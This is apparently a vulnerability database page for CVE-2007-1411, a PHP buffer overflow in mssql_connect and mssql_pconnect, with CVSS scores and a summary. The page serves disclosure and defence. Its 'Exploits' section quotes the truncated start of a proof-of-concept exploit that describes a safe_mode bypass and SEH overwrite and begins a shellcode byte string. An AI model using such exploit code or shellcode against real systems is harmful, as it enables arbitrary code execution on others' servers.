6.8
CVSSv2

CVE-2007-1411

Published: 10/03/2007 Updated: 19/10/2018
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in PHP 4.4.6 and previous versions, and unspecified PHP 5 versions, allows local and possibly remote malicious users to execute arbitrary code via long server name arguments to the (1) mssql_connect and (2) mssql_pconnect functions.

Vulnerable Product Search on Vulmon Subscribe to Product

php php

Exploits

<?php // PHP <= 446 mssql_connect() & mssql_pconnect() local buffer overflow // poc exploit (and safe_mode bypass) // windows 2000 sp3 en / seh overwrite // by rgod // site: retrogodaltervistaorg // u can easily adjust for php5 // this as my little contribute to MOPB $____scode= "\xeb\x1b" "\x5b" "\x31\xc0" "\x50" "\x31\ ...